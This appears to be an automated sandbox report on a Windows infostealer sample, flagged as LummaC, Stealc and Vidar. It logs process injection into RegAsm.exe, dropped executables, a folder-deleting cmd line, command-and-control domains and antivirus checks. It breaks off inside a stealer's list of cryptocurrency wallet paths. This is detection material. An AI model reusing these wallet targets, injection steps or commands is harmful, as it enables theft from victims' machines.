Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
LummaC encrypted strings found
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: absorptioniw.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: mysterisop.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: snarlypagowo.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: treatynreit.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: chorusarorp.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: abnomalrkmu.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: soldiefieop.site
Source: GDBFCGIIIJ.exe, 00000007.00000002.2265563842.0000000003CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: questionsmw.stor
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_0041257F
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A89008 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B22008 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9A2008 Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 115C008
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\userBAAAAKJKJE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C6B008
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\Users\userAFIDGDBGCA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3F008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KJEGDBKFIJ.exe "C:\ProgramData\KJEGDBKFIJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\IIJKJDAFHJ.exe "C:\ProgramData\IIJKJDAFHJ.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userBAAAAKJKJE.exe "C:\Users\userBAAAAKJKJE.exe"
Source: C:\Users\userBAAAAKJKJE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAFIDGDBGCA.exe "C:\Users\userAFIDGDBGCA.exe"
Source: C:\Users\userAFIDGDBGCA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040111D cpuid 2_2_0040111D
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 2_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 2_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 2_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 2_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 2_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 2_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 2_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesA, 2_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 2_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 2_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 2_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA, 2_2_0042E6A4
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Queries volume information: C:\ProgramData\GDBFCGIIIJ.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Queries volume information: C:\ProgramData\KJEGDBKFIJ.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Queries volume information: C:\ProgramData\IIJKJDAFHJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\userBAAAAKJKJE.exe Queries volume information: C:\Users\userBAAAAKJKJE.exe VolumeInformation
Source: C:\Users\userAFIDGDBGCA.exe Queries volume information: C:\Users\userAFIDGDBGCA.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime, 2_2_0041C0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: IIJKJDAFHJ.exe, 0000000D.00000002.2314833260.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HJ.exe
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.000000000111A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.IIJKJDAFHJ.exe.3f55570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.IIJKJDAFHJ.exe.3f55570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2320759817.0000000003F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2759155964.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.37e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.37e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1700, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local 